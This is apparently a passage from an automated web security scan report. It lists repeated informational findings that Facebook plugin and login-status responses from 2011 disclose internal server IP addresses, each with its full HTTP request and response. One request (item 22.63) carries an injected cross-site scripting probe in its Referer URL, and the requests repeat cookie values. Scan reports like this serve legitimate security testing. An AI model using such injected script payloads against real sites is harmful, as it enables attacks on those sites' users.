Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.135.48
X-Cnection: close
Date: Sat, 17 Sep 2011 17:02:14 GMT
Content-Length: 1075

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"ugo.com","channel":"http:\/
...[SNIP]...
22.48. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=6606a44d10f0b87a63e3258379b62940&extern=2&channel=http%3A%2F%2Fwww.ugo.com%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.105.49
X-Cnection: close
Date: Sat, 17 Sep 2011 17:07:37 GMT
Content-Length: 1075

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"ugo.com","channel":"http:\/
...[SNIP]...
22.49. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=225566057486878&app_id=225566057486878&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc16d2f5c%26origin%3Dhttp%253A%252F%252Fwww.uproxx.com%252Ffe08a6e4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d7fc1bf8%26origin%3Dhttp%253A%252F%252Fwww.uproxx.com%252Ffe08a6e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1045013ec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df437aadec%26origin%3Dhttp%253A%252F%252Fwww.uproxx.com%252Ffe08a6e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1045013ec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3bf105ff8%26origin%3Dhttp%253A%252F%252Fwww.uproxx.com%252Ffe08a6e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1045013ec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2839ee438%26origin%3Dhttp%253A%252F%252Fwww.uproxx.com%252Ffe08a6e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1045013ec&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.uproxx.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.76.118
X-Cnection: close
Date: Sat, 17 Sep 2011 17:36:22 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
22.50. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=6606a44d10f0b87a63e3258379b62940&extern=2&channel=http%3A%2F%2Fwww.ugo.com%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.249.62
X-Cnection: close
Date: Sat, 17 Sep 2011 16:31:49 GMT
Content-Length: 1075

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"ugo.com","channel":"http:\/
...[SNIP]...
22.51. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=112965278727107&app_id=112965278727107&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1fe8b9628%26origin%3Dhttp%253A%252F%252Fwww.seventeen.com%252Ff176a6a3d8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df14b5bdd78%26origin%3Dhttp%253A%252F%252Fwww.seventeen.com%252Ff176a6a3d8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2e145f958%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1783b9ec8%26origin%3Dhttp%253A%252F%252Fwww.seventeen.com%252Ff176a6a3d8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2e145f958&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df36edd2eac%26origin%3Dhttp%253A%252F%252Fwww.seventeen.com%252Ff176a6a3d8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2e145f958&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df10c756594%26origin%3Dhttp%253A%252F%252Fwww.seventeen.com%252Ff176a6a3d8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2e145f958&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.seventeen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.117.81
X-Cnection: close
Date: Sat, 17 Sep 2011 16:25:25 GMT
Content-Length: 247

<script type="text/javascript">
parent.postMessage("cb=f36edd2eac&origin=http\u00253A\u00252F\u00252Fwww.seventeen.com\u00252Ff176a6a3d8&relation=parent&transport=postmessage&frame=f2e145f958", "http:
...[SNIP]...
22.52. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=6606a44d10f0b87a63e3258379b62940&extern=0&channel=http%3A%2F%2Fwww.ugo.com%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.36.104
X-Cnection: close
Date: Sat, 17 Sep 2011 16:40:37 GMT
Content-Length: 1074

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"ugo.com","channel":"http:\/
...[SNIP]...
22.53. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.12.64
X-Cnection: close
Date: Sat, 17 Sep 2011 16:36:56 GMT
Content-Length: 14182

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="3e7j";</scri
...[SNIP]...
22.54. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.243.49
X-Cnection: close
Date: Sat, 17 Sep 2011 16:31:25 GMT
Content-Length: 14181

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="vPcL";</scri
...[SNIP]...
22.55. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.33.113
X-Cnection: close
Date: Sat, 17 Sep 2011 16:43:08 GMT
Content-Length: 14199

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="3uj4";</scri
...[SNIP]...
22.56. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.220.118
X-Cnection: close
Date: Sat, 17 Sep 2011 17:18:08 GMT
Content-Length: 14200

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="ieEV";</scri
...[SNIP]...
22.57. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.52.81
X-Cnection: close
Date: Sat, 17 Sep 2011 17:07:21 GMT
Content-Length: 14202

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="pp7Y";</scri
...[SNIP]...
22.58. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.99.120
X-Cnection: close
Date: Sat, 17 Sep 2011 17:12:45 GMT
Content-Length: 14201

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="uEKE";</scri
...[SNIP]...
22.59. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.6.31
X-Cnection: close
Date: Sat, 17 Sep 2011 16:30:15 GMT
Content-Length: 14238

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="TDBf";</scri
...[SNIP]...
22.60. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.249.63
X-Cnection: close
Date: Sat, 17 Sep 2011 16:49:55 GMT
Content-Length: 14181

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="Ek2Z";</scri
...[SNIP]...
22.61. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.230.36
X-Cnection: close
Date: Sat, 17 Sep 2011 16:57:08 GMT
Content-Length: 14201

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="kehT";</scri
...[SNIP]...
22.62. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=www.ugo.com&width=300&height=300&header=false&colorscheme=dark&font=arial&border_color=black HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.125.118
X-Cnection: close
Date: Sat, 17 Sep 2011 17:23:35 GMT
Content-Length: 14200

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="xtOA";</scri
...[SNIP]...
22.63. http://www.facebook.com/plugins/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/fan.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/fan.php?id=31818566964&width=300&connections=10&stream=false&header=true&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.126.34
X-Cnection: close
Date: Sat, 17 Sep 2011 16:34:46 GMT
Content-Length: 12041

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
22.64. http://www.facebook.com/plugins/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/fan.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/fan.php?id=31818566964&width=300&connections=10&stream=false&header=true&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.233.57
X-Cnection: close
Date: Sat, 17 Sep 2011 16:36:39 GMT
Content-Length: 11901

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
22.65. http://www.facebook.com/plugins/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/fan.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/fan.php?id=31818566964&width=300&connections=10&stream=false&header=true&locale=en_US HTTP/1.1
Host: www.facebook.com
